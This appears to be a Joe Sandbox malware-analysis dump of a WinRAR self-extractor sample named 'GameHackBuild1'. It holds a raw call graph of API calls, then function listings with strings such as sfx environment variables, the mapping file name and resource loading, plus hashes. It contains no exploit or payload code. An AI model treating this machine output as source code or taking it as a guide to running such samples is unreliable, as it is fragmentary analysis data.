__vswprintf_c_l 21 API calls 24483->24489 24490 a2a0e4 __vsnwprintf_l 24483->24490 24485 a1ec4a ___delayLoadHelper2@8 5 API calls 24484->24485 24486 a2a260 24485->24486 24486->24459 24487 a2a199 24516 a2a2c0 20 API calls _free 24487->24516 24488 a2a12d MultiByteToWideChar 24488->24487 24491 a2a146 24488->24491 24489->24490 24490->24487 24490->24488 24507 a2a72c 24491->24507 24495 a2a170 24495->24487 24499 a2a72c __vswprintf_c_l 11 API calls 24495->24499 24496 a2a1a8 24497 a28518 __vswprintf_c_l 21 API calls 24496->24497 24501 a2a1c9 __vsnwprintf_l 24496->24501 24497->24501 24498 a2a23e 24515 a2a2c0 20 API calls _free 24498->24515 24499->24487 24501->24498 24502 a2a72c __vswprintf_c_l 11 API calls 24501->24502 24503 a2a21d 24502->24503 24503->24498 24504 a2a22c WideCharToMultiByte 24503->24504 24504->24498 24505 a2a26c 24504->24505 24517 a2a2c0 20 API calls _free 24505->24517 24508 a2a458 __dosmaperr 5 API calls 24507->24508 24509 a2a753 24508->24509 24510 a2a75c 24509->24510 24518 a2a7b4 10 API calls 3 library calls 24509->24518 24513 a1ec4a ___delayLoadHelper2@8 5 API calls 24510->24513 24512 a2a79c LCMapStringW 24512->24510 24514 a2a15d 24513->24514 24514->24487 24514->24495 24514->24496 24515->24487 24516->24484 24517->24487 24518->24512 24520 a1e360 24519->24520 24521 a100d9 GetModuleHandleW 24520->24521 24522 a100f0 GetProcAddress 24521->24522 24523 a10154 24521->24523 24524 a10121 GetProcAddress 24522->24524 24525 a10109 24522->24525 24526 a10484 GetModuleFileNameW 24523->24526 24619 a270dd 42 API calls __vsnwprintf_l 24523->24619 24524->24523 24527 a10133 24524->24527 24525->24524 24539 a104a3 24526->24539 24527->24523 24529 a103be 24529->24526 24530 a103c9 GetModuleFileNameW CreateFileW 24529->24530 24531 a10478 CloseHandle 24530->24531 24532 a103fc SetFilePointer 24530->24532 24531->24526 24532->24531 24533 a1040c ReadFile 24532->24533 24533->24531 24536 a1042b 24533->24536 24536->24531 24538 a10085 2 API calls 24536->24538 24537 a104d2 CompareStringW 24537->24539 24538->24536 24539->24537 24540 a10508 GetFileAttributesW 24539->24540 24541 a10520 24539->24541 24610 a0acf5 24539->24610 24613 a10085 24539->24613 24540->24539 24540->24541 24542 a1052a 24541->24542 24545 a10560 24541->24545 24544 a10542 GetFileAttributesW 24542->24544 24546 a1055a 24542->24546 24543 a1066f 24567 a19da4 GetCurrentDirectoryW 24543->24567 24544->24542 24544->24546 24545->24543 24547 a0acf5 GetVersionExW 24545->24547 24546->24545 24548 a1057a 24547->24548 24549 a10581 24548->24549 24550 a105e7 24548->24550 24552 a10085 2 API calls 24549->24552 24551 a0400a _swprintf 51 API calls 24550->24551 24554 a1060f AllocConsole 24551->24554 24553 a1058b 24552->24553 24555 a10085 2 API calls 24553->24555 24556 a10667 ExitProcess 24554->24556 24557 a1061c GetCurrentProcessId AttachConsole 24554->24557 24558 a10595 24555->24558 24620 a235b3 24557->24620 24561 a0ddd1 53 API calls 24558->24561 24560 a1063d GetStdHandle WriteConsoleW Sleep FreeConsole 24560->24556 24562 a105b0 24561->24562 24563 a0400a _swprintf 51 API calls 24562->24563 24564 a105c3 24563->24564 24565 a0ddd1 53 API calls 24564->24565 24566 a105d2 24565->24566 24566->24556 24567->24280 24569 a10085 2 API calls 24568->24569 24570 a1a349 OleInitialize 24569->24570 24571 a1a36c GdiplusStartup SHGetMalloc 24570->24571 24571->24282 24573 a113d7 IsDBCSLeadByte 24572->24573 24573->24573 24574 a113ef 24573->24574 24574->24284 24576 a1ae15 24575->24576 24577 a1ae0e 24575->24577 24579 a1ae1b GetObjectW 24576->24579 24580 a1ae2a 24576->24580 24622 a19e1c FindResourceW 24577->24622 24579->24580 24581 a19d1a 4 API calls 24580->24581 24582 a1ae3d 24581->24582 24583 a1ae80 24582->24583 24584 a1ae5c 24582->24584 24586 a19e1c 13 API calls 24582->24586 24594 a0d31c 24583->24594 24638 a19d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24584->24638 24588 a1ae4d 24586->24588 24587 a1ae64 24639 a19d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24587->24639 24588->24584 24590 a1ae53 DeleteObject 24588->24590 24590->24584 24591 a1ae6d 24640 a19f5d 8 API calls ___scrt_fastfail 24591->24640 24593 a1ae74 DeleteObject 24593->24583 24649 a0d341 24594->24649 24596 a0d328 24689 a0da4e GetModuleHandleW FindResourceW 24596->24689 24599 a18835 24600 a1e24a new 8 API calls 24599->24600 24601 a18854 24600->24601 24601->24306 24603 a1a3cc GdiplusShutdown CoUninitialize 24602->24603 24603->24322 24605->24291 24606->24307 24607->24286 24608->24314 24609->24320 24611 a0ad09 GetVersionExW 24610->24611 24612 a0ad45 24610->24612 24611->24612 24612->24539 24614 a1e360 24613->24614 24615 a10092 GetSystemDirectoryW 24614->24615 24616 a100c8 24615->24616 24617 a100aa 24615->24617 24616->24539 24618 a100bb LoadLibraryW 24617->24618 24618->24616 24619->24529 24621 a235bb 24620->24621 24621->24560 24621->24621 24623 a19e70 24622->24623 24624 a19e3e SizeofResource 24622->24624 24623->24576 24624->24623 24625 a19e52 LoadResource 24624->24625 24625->24623 24626 a19e63 LockResource 24625->24626 24626->24623 24627 a19e77 GlobalAlloc 24626->24627 24627->24623 24628 a19e92 GlobalLock 24627->24628 24629 a19f21 GlobalFree 24628->24629 24630 a19ea1 __vsnwprintf_l 24628->24630 24629->24623 24631 a19ea9 CreateStreamOnHGlobal 24630->24631 24632 a19ec1 24631->24632 24633 a19f1a GlobalUnlock 24631->24633 24641 a19d7b GdipAlloc 24632->24641 24633->24629 24636 a19eef GdipCreateHBITMAPFromBitmap 24637 a19f05 24636->24637 24637->24633 24638->24587 24639->24591 24640->24593 24642 a19d8d 24641->24642 24643 a19d9a 24641->24643 24645 a19b0f 24642->24645 24643->24633 24643->24636 24643->24637 24646 a19b30 GdipCreateBitmapFromStreamICM 24645->24646 24647 a19b37 GdipCreateBitmapFromStream 24645->24647 24648 a19b3c 24646->24648 24647->24648 24648->24643 24650 a0d34b _wcschr __EH_prolog 24649->24650 24651 a0d37a GetModuleFileNameW 24650->24651 24652 a0d3ab 24650->24652 24653 a0d394 24651->24653 24691 a099b0 24652->24691 24653->24652 24655 a09653 79 API calls 24657 a0d7ab 24655->24657 24656 a0d407 24702 a25a90 26 API calls 3 library calls 24656->24702 24657->24596 24658 a13781 76 API calls 24660 a0d3db 24658->24660 24660->24656 24660->24658 24674 a0d627 24660->24674 24661 a0d41a 24703 a25a90 26 API calls 3 library calls 24661->24703 24663 a0d563 24663->24674 24721 a09d30 77 API calls 24663->24721 24667 a0d57d ___std_exception_copy 24668 a09bf0 80 API calls 24667->24668 24667->24674 24671 a0d5a6 ___std_exception_copy 24668->24671 24670 a0d42c 24670->24663 24670->24674 24704 a09e40 24670->24704 24712 a09bf0 24670->24712 24720 a09d30 77 API calls 24670->24720 24673 a0d5b2 ___std_exception_copy 24671->24673 24671->24674 24722 a1137a MultiByteToWideChar 24671->24722 24673->24674 24675 a0d72b 24673->24675 24678 a0da0a 24673->24678 24680 a0d9fa 24673->24680 24686 a11596 WideCharToMultiByte 24673->24686 24726 a0dd6b 50 API calls __vsnprintf 24673->24726 24727 a258d9 26 API calls 3 library calls 24673->24727 24674->24655 24723 a0ce72 76 API calls 24675->24723 24677 a0d742 24681 a0d771 24677->24681 24684 a13781 76 API calls 24677->24684 24728 a0ce72 76 API calls 24678->24728 24680->24596 24724 a25a90 26 API calls 3 library calls 24681->24724 24683 a0d78b 24725 a25a90 26 API calls 3 library calls 24683->24725 24684->24677 24686->24673 24690 a0d32f 24689->24690 24690->24599 24692 a099ba 24691->24692 24693 a09a39 CreateFileW 24692->24693 24694 a09a59 GetLastError 24693->24694 24695 a09aaa 24693->24695 24697 a0b66c 2 API calls 24694->24697 24696 a09ae1 24695->24696 24698 a09ac7 SetFileTime 24695->24698 24696->24660 24699 a09a79 24697->24699 24698->24696 24699->24695 24700 a09a7d CreateFileW GetLastError 24699->24700 24701 a09aa1 24700->24701 24701->24695 24702->24661 24703->24670 24705 a09e64 SetFilePointer 24704->24705 24706 a09e53 24704->24706 24707 a09e82 GetLastError 24705->24707 24708 a09e9d 24705->24708 24706->24708 24729 a06fa5 75 API calls 24706->24729 24707->24708 24710 a09e8c 24707->24710 24708->24670 24710->24708 24730 a06fa5 75 API calls 24710->24730 24714 a09bfc 24712->24714 24717 a09c03 24712->24717 24714->24670 24715 a09cc0 24715->24714 24719 a0984e 5 API calls 24715->24719 24716 a09c9e 24716->24714 24743 a06f6b 75 API calls 24716->24743 24717->24714 24717->24715 24717->24716 24731 a0984e 24717->24731 24719->24715 24720->24670 24721->24667 24722->24673 24723->24677 24724->24683 24725->24674 24726->24673 24727->24673 24728->24680 24729->24705 24730->24708 24732 a09867 ReadFile 24731->24732 24733 a0985c GetStdHandle 24731->24733 24734 a09880 24732->24734 24740 a098a0 24732->24740 24733->24732 24735 a09989 GetFileType 24734->24735 24736 a09887 24735->24736 24737 a09895 24736->24737 24738 a098b7 24736->24738 24739 a098a8 GetLastError 24736->24739 24742 a0984e GetFileType 24737->24742 24738->24740 24741 a098c7 GetLastError 24738->24741 24739->24738 24739->24740 24740->24717 24741->24737 24741->24740 24742->24740 24743->24714 24745 a27430 _GetRangeOfTrysToCheck 24744->24745 24746 a2757e _abort GetModuleHandleW 24745->24746 24754 a27448 24745->24754 24748 a2743c 24746->24748 24748->24754 24778 a275c2 GetModuleHandleExW 24748->24778 24749 a27450 24753 a274c5 24749->24753 24763 a274ee 24749->24763 24786 a27f30 20 API calls _abort 24749->24786 24757 a274dd 24753->24757 24761 a281f1 _abort 5 API calls 24753->24761 24766 a2a3f1 EnterCriticalSection 24754->24766 24755 a27537 24787 a31a19 5 API calls ___delayLoadHelper2@8 24755->24787 24756 a2750b 24770 a2753d 24756->24770 24762 a281f1 _abort 5 API calls 24757->24762 24761->24757 24762->24763 24767 a2752e 24763->24767 24766->24749 24788 a2a441 LeaveCriticalSection 24767->24788 24769 a27507 24769->24755 24769->24756 24789 a2a836 24770->24789 24773 a2756b 24775 a275c2 _abort 8 API calls 24773->24775 24774 a2754b GetPEB 24774->24773 24776 a2755b GetCurrentProcess TerminateProcess 24774->24776 24777 a27573 ExitProcess 24775->24777 24776->24773 24779 a2760f 24778->24779 24780 a275ec GetProcAddress 24778->24780 24781 a27615 FreeLibrary 24779->24781 24782 a2761e 24779->24782 24783 a27601 24780->24783 24781->24782 24784 a1ec4a ___delayLoadHelper2@8 5 API calls 24782->24784 24783->24779 24785 a27628 24784->24785 24785->24754 24786->24753 24788->24769 24790 a2a85b 24789->24790 24792 a2a851 24789->24792 24791 a2a458 __dosmaperr 5 API calls 24790->24791 24791->24792 24793 a1ec4a ___delayLoadHelper2@8 5 API calls 24792->24793 24794 a27547 24793->24794 24794->24773 24794->24774 24795 a010d5 24800 a05bd7 24795->24800 24801 a05be1 __EH_prolog 24800->24801 24802 a0b07d 82 API calls 24801->24802 24803 a05bed 24802->24803 24807 a05dcc GetCurrentProcess GetProcessAffinityMask 24803->24807 24850 a01025 29 API calls pre_c_initialization 22934 a09f2f 22935 a09f44 22934->22935 22940 a09f3d 22934->22940 22936 a09f4a GetStdHandle 22935->22936 22944 a09f55 22935->22944 22936->22944 22937 a09fa9 WriteFile 22937->22944 22938 a09f7a 22939 a09f7c WriteFile 22938->22939 22938->22944 22939->22938 22939->22944 22942 a0a031 22946 a07061 75 API calls 22942->22946 22944->22937 22944->22938 22944->22939 22944->22940 22944->22942 22945 a06e18 60 API calls 22944->22945 22945->22944 22946->22940 24851 a1a430 73 API calls 24902 a1be49 103 API calls 4 library calls 23002 a1db01 23004 a1daaa 23002->23004 23005 a1df59 23004->23005 23033 a1dc67 23005->23033 23007 a1df73 23008 a1dfd0 23007->23008 23019 a1dff4 23007->23019 23009 a1ded7 DloadReleaseSectionWriteAccess 11 API calls 23008->23009 23010 a1dfdb RaiseException 23009->23010 23011 a1e1c9 23010->23011 23013 a1ec4a ___delayLoadHelper2@8 5 API calls 23011->23013 23012 a1e06c LoadLibraryExA 23014 a1e0cd 23012->23014 23015 a1e07f GetLastError 23012->23015 23016 a1e1d8 23013->23016 23017 a1e0df 23014->23017 23020 a1e0d8 FreeLibrary 23014->23020 23021 a1e092 23015->23021 23022 a1e0a8 23015->23022 23016->23004 23018 a1e13d GetProcAddress 23017->23018 23028 a1e19b 23017->23028 23024 a1e14d GetLastError 23018->23024 23018->23028 23019->23012 23019->23014 23019->23017 23019->23028 23020->23017 23021->23014 23021->23022 23023 a1ded7 DloadReleaseSectionWriteAccess 11 API calls 23022->23023 23025 a1e0b3 RaiseException 23023->23025 23026 a1e160 23024->23026 23025->23011 23026->23028 23029 a1ded7 DloadReleaseSectionWriteAccess 11 API calls 23026->23029 23044 a1ded7 23028->23044 23030 a1e181 RaiseException 23029->23030 23031 a1dc67 ___delayLoadHelper2@8 11 API calls 23030->23031 23032 a1e198 23031->23032 23032->23028 23034 a1dc73 23033->23034 23035 a1dc99 23033->23035 23052 a1dd15 23034->23052 23035->23007 23038 a1dc94 23062 a1dc9a 23038->23062 23041 a1ec4a ___delayLoadHelper2@8 5 API calls 23042 a1df55 23041->23042 23042->23007 23043 a1df24 23043->23041 23045 a1dee9 23044->23045 23046 a1df0b 23044->23046 23047 a1dd15 DloadLock 8 API calls 23045->23047 23046->23011 23048 a1deee 23047->23048 23049 a1df06 23048->23049 23051 a1de67 DloadProtectSection 3 API calls 23048->23051 23071 a1df0f 8 API calls 2 library calls 23049->23071 23051->23049 23053 a1dc9a DloadUnlock 3 API calls 23052->23053 23054 a1dd2a 23053->23054 23055 a1ec4a ___delayLoadHelper2@8 5 API calls 23054->23055 23056 a1dc78 23055->23056 23056->23038 23057 a1de67 23056->23057 23060 a1de7c DloadObtainSection 23057->23060 23058 a1de82 23058->23038 23059 a1deb7 VirtualProtect 23059->23058 23060->23058 23060->23059 23070 a1dd72 VirtualQuery GetSystemInfo 23060->23070 23063 a1dca7 23062->23063 23064 a1dcab 23062->23064 23063->23043 23065 a1dcb3 GetModuleHandleW 23064->23065 23066 a1dcaf 23064->23066 23067 a1dcc9 GetProcAddress 23065->23067 23069 a1dcc5 23065->23069 23066->23043 23068 a1dcd9 GetProcAddress 23067->23068 23067->23069 23068->23069 23069->23043 23070->23059 23071->23046 24852 a1ea00 46 API calls 6 library calls 24904 a01f05 126 API calls __EH_prolog 24853 a1ec0b 28 API calls 2 library calls 24906 a1db0b 19 API calls ___delayLoadHelper2@8 23077 a1c40e 23078 a1c4c7 23077->23078 23085 a1c42c _wcschr 23077->23085 23079 a1c4e5 23078->23079 23096 a1be49 _wcsrchr 23078->23096 23132 a1ce22 23078->23132 23082 a1ce22 18 API calls 23079->23082 23079->23096 23082->23096 23083 a1ca8d 23085->23078 23086 a117ac CompareStringW 23085->23086 23086->23085 23087 a1c11d SetWindowTextW 23087->23096 23092 a1bf0b SetFileAttributesW 23094 a1bfc5 GetFileAttributesW 23092->23094 23095 a1bf25 ___scrt_fastfail 23092->23095 23094->23096 23098 a1bfd7 DeleteFileW 23094->23098 23095->23094 23095->23096 23112 a0b4f7 52 API calls 2 library calls 23095->23112 23096->23083 23096->23087 23096->23092 23099 a1c2e7 GetDlgItem SetWindowTextW SendMessageW 23096->23099 23103 a1c327 SendMessageW 23096->23103 23106 a117ac CompareStringW 23096->23106 23107 a1aa36 23096->23107 23111 a19da4 GetCurrentDirectoryW 23096->23111 23116 a0a52a 7 API calls 23096->23116 23117 a0a4b3 FindClose 23096->23117 23118 a1ab9a 76 API calls ___std_exception_copy 23096->23118 23119 a235de 23096->23119 23098->23096 23100 a1bfe8 23098->23100 23099->23096 23113 a0400a 23100->23113 23103->23096 23104 a1c01d MoveFileW 23104->23096 23105 a1c035 MoveFileExW 23104->23105 23105->23096 23106->23096 23109 a1aa40 23107->23109 23108 a1ab16 23108->23096 23109->23108 23110 a1aaf3 ExpandEnvironmentStringsW 23109->23110 23110->23108 23111->23096 23112->23095 23155 a03fdd 23113->23155 23116->23096 23117->23096 23118->23096 23120 a28606 23119->23120 23121 a28613 23120->23121 23122 a2861e 23120->23122 23227 a28518 23121->23227 23124 a28626 23122->23124 23131 a2862f __dosmaperr 23122->23131 23127 a284de _free 20 API calls 23124->23127 23125 a28634 23234 a2895a 20 API calls __dosmaperr 23125->23234 23126 a28659 HeapReAlloc 23129 a2861b 23126->23129 23126->23131 23127->23129 23129->23096 23131->23125 23131->23126 23235 a271ad 7 API calls 2 library calls 23131->23235 23133 a1ce2c ___scrt_fastfail 23132->23133 23136 a1cf1b 23133->23136 23140 a1d08a 23133->23140 23241 a117ac CompareStringW 23133->23241 23238 a0a180 23136->23238 23138 a1cf4f ShellExecuteExW 23138->23140 23146 a1cf62 23138->23146 23140->23079 23141 a1cf47 23141->23138 23142 a1cf9b 23243 a1d2e6 6 API calls 23142->23243 23143 a1cff1 CloseHandle 23144 a1cfff 23143->23144 23145 a1d00a 23143->23145 23244 a117ac CompareStringW 23144->23244 23145->23140 23151 a1d081 ShowWindow 23145->23151 23146->23142 23146->23143 23148 a1cf91 ShowWindow 23146->23148 23148->23142 23150 a1cfb3 23150->23143 23152 a1cfc6 GetExitCodeProcess 23150->23152 23151->23140 23152->23143 23153 a1cfd9 23152->23153 23153->23143 23156 a03ff4 __vsnwprintf_l 23155->23156 23159 a25759 23156->23159 23162 a23837 23159->23162 23163 a23877 23162->23163 23164 a2385f 23162->23164 23163->23164 23166 a2387f 23163->23166 23179 a2895a 20 API calls __dosmaperr 23164->23179 23181 a23dd6 23166->23181 23167 a23864 23180 a28839 26 API calls ___std_exception_copy 23167->23180 23171 a2386f 23173 a1ec4a ___delayLoadHelper2@8 5 API calls 23171->23173 23175 a03ffe GetFileAttributesW 23173->23175 23174 a23907 23190 a24186 51 API calls 4 library calls 23174->23190 23175->23100 23175->23104 23178 a23912 23191 a23e59 20 API calls _free 23178->23191 23179->23167 23180->23171 23182 a23df3 23181->23182 23183 a2388f 23181->23183 23182->23183 23192 a28fa5 GetLastError 23182->23192 23189 a23da1 20 API calls 2 library calls 23183->23189 23185 a23e14 23213 a290fa 38 API calls __fassign 23185->23213 23187 a23e2d 23214 a29127 38 API calls __fassign 23187->23214 23189->23174 23190->23178 23191->23171 23193 a28fc7 23192->23193 23194 a28fbb 23192->23194 23216 a285a9 20 API calls 2 library calls 23193->23216 23215 a2a61b 11 API calls 2 library calls 23194->23215 23197 a28fc1 23197->23193 23199 a29010 SetLastError 23197->23199 23198 a28fd3 23205 a28fdb 23198->23205 23223 a2a671 11 API calls 2 library calls 23198->23223 23199->23185 23201 a28ff0 23204 a28ff7 23201->23204 23201->23205 23203 a28fe1 23206 a2901c SetLastError 23203->23206 23224 a28e16 20 API calls __dosmaperr 23204->23224 23217 a284de 23205->23217 23225 a28566 38 API calls _abort 23206->23225 23208 a29002 23210 a284de _free 20 API calls 23208->23210 23212 a29009 23210->23212 23212->23199 23212->23206 23213->23187 23214->23183 23215->23197 23216->23198 23218 a28512 __dosmaperr 23217->23218 23219 a284e9 RtlFreeHeap 23217->23219 23218->23203 23219->23218 23220 a284fe 23219->23220 23226 a2895a 20 API calls __dosmaperr 23220->23226 23222 a28504 GetLastError 23222->23218 23223->23201 23224->23208 23226->23222 23228 a28556 23227->23228 23232 a28526 __dosmaperr 23227->23232 23237 a2895a 20 API calls __dosmaperr 23228->23237 23230 a28541 RtlAllocateHeap 23231 a28554 23230->23231 23230->23232 23231->23129 23232->23228 23232->23230 23236 a271ad 7 API calls 2 library calls 23232->23236 23234->23129 23235->23131 23236->23232 23237->23231 23245 a0a194 23238->23245 23241->23136 23242 a0b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23242->23141 23243->23150 23244->23145 23253 a1e360 23245->23253 23248 a0a1b2 23255 a0b66c 23248->23255 23249 a0a189 23249->23138 23249->23242 23251 a0a1c6 23251->23249 23252 a0a1ca GetFileAttributesW 23251->23252 23252->23249 23254 a0a1a1 GetFileAttributesW 23253->23254 23254->23248 23254->23249 23256 a0b679 23255->23256 23264 a0b683 23256->23264 23265 a0b806 CharUpperW 23256->23265 23258 a0b692 23266 a0b832 CharUpperW 23258->23266 23260 a0b6a1 23261 a0b6a5 23260->23261 23262 a0b71c GetCurrentDirectoryW 23260->23262 23267 a0b806 CharUpperW 23261->23267 23262->23264 23264->23251 23265->23258 23266->23260 23267->23264 24907 a06110 80 API calls 24908 a2b710 GetProcessHeap 24909 a2a918 27 API calls 3 library calls 24910 a1be49 108 API calls 4 library calls 24855 a1fc60 51 API calls 2 library calls 24857 a23460 RtlUnwind 24858 a29c60 71 API calls _free 24859 a29e60 31 API calls 2 library calls 24192 a1d573 24193 a1d580 24192->24193 24194 a0ddd1 53 API calls 24193->24194 24195 a1d594 24194->24195 24196 a0400a _swprintf 51 API calls 24195->24196 24197 a1d5a6 SetDlgItemTextW 24196->24197 24198 a1ac74 5 API calls 24197->24198 24199 a1d5c3 24198->24199 24864 a01075 82 API calls pre_c_initialization 24865 a15c77 121 API calls __vsnwprintf_l 24912 a1be49 98 API calls 3 library calls 24866 a1ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24867 a18c40 GetClientRect 24868 a23040 5 API calls 2 library calls 24869 a30040 IsProcessorFeaturePresent 24913 a1d34e DialogBoxParamW 24914 a19b50 GdipDisposeImage GdipFree __except_handler4 24872 a28050 8 API calls ___vcrt_uninitialize 24810 a09b59 24811 a09bd7 24810->24811 24814 a09b63 24810->24814 24812 a09bad SetFilePointer 24812->24811 24813 a09bcd GetLastError 24812->24813 24813->24811 24814->24812

                                      Executed Functions

                                      Function 00A1D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00A100CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00A100E4
                                        • Part of subcall function 00A100CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A100F6
                                        • Part of subcall function 00A100CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A10127
                                        • Part of subcall function 00A19DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A19DAC
                                        • Part of subcall function 00A1A335: OleInitialize.OLE32(00000000), ref: 00A1A34E
                                        • Part of subcall function 00A1A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A1A385
                                        • Part of subcall function 00A1A335: SHGetMalloc.SHELL32(00A48430), ref: 00A1A38F
                                        • Part of subcall function 00A113B3: GetCPInfo.KERNEL32(00000000,?), ref: 00A113C4
                                        • Part of subcall function 00A113B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00A113D8
                                      • GetCommandLineW.KERNEL32 ref: 00A1D61C
                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A1D643
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00A1D654
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00A1D68E
                                        • Part of subcall function 00A1D287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A1D29D
                                        • Part of subcall function 00A1D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A1D2D9
                                      • CloseHandle.KERNEL32(00000000), ref: 00A1D697
                                      • GetModuleFileNameW.KERNEL32(00000000,00A5DC90,00000800), ref: 00A1D6B2
                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00A5DC90), ref: 00A1D6BE
                                      • GetLocalTime.KERNEL32(?), ref: 00A1D6C9
                                      • _swprintf.LIBCMT ref: 00A1D708
                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A1D71A
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00A1D721
                                      • LoadIconW.USER32(00000000,00000064), ref: 00A1D738
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00A1D789
                                      • Sleep.KERNEL32(?), ref: 00A1D7B7
                                      • DeleteObject.GDI32 ref: 00A1D7F0
                                      • DeleteObject.GDI32(?), ref: 00A1D800
                                      • CloseHandle.KERNEL32 ref: 00A1D843
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                      • API String ID: 788466649-433059772
                                      • Opcode ID: 4bd848df95d71dd0945334ce7d926340775a2ec6669b0d0e9f4b93c0432d0867
                                      • Instruction ID: 4ba263efe6f8db33d8edb012ac854e794731c7d55ddc6f95e8a50e354172b0c4
                                      • Opcode Fuzzy Hash: 4bd848df95d71dd0945334ce7d926340775a2ec6669b0d0e9f4b93c0432d0867
                                      • Instruction Fuzzy Hash: 8B61F179904340AFD720EFE4ED49FAB37A8BB85741F000429F94592191DBB9CD86C7A2
                                      Function 00A19E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 770 a19e1c-a19e38 FindResourceW 771 a19f2f-a19f32 770->771 772 a19e3e-a19e50 SizeofResource 770->772 773 a19e70-a19e72 772->773 774 a19e52-a19e61 LoadResource 772->774 775 a19f2e 773->775 774->773 776 a19e63-a19e6e LockResource 774->776 775->771 776->773 777 a19e77-a19e8c GlobalAlloc 776->777 778 a19e92-a19e9b GlobalLock 777->778 779 a19f28-a19f2d 777->779 780 a19f21-a19f22 GlobalFree 778->780 781 a19ea1-a19ebf call a1f4b0 CreateStreamOnHGlobal 778->781 779->775 780->779 784 a19ec1-a19ee3 call a19d7b 781->784 785 a19f1a-a19f1b GlobalUnlock 781->785 784->785 790 a19ee5-a19eed 784->790 785->780 791 a19f08-a19f16 790->791 792 a19eef-a19f03 GdipCreateHBITMAPFromBitmap 790->792 791->785 792->791 793 a19f05 792->793 793->791
                                      APIs
                                      • FindResourceW.KERNEL32(00A1AE4D,PNG,?,?,?,00A1AE4D,00000066), ref: 00A19E2E
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E46
                                      • LoadResource.KERNEL32(00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E59
                                      • LockResource.KERNEL32(00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E64
                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A1AE4D,00000066), ref: 00A19E82
                                      • GlobalLock.KERNEL32(00000000), ref: 00A19E93
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A19EB7
                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A19EFC
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A19F1B
                                      • GlobalFree.KERNEL32(00000000), ref: 00A19F22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                      • String ID: PNG
                                      • API String ID: 3656887471-364855578
                                      • Opcode ID: 7498fb9e7530962b23755534e66d1bb8d839221fd8ac3d38f68144dfe3b5e878
                                      • Instruction ID: 108ce351b88eda6ed1c6d2b20040110694d86d8b8e25edcfc8ea2e02b70e4872
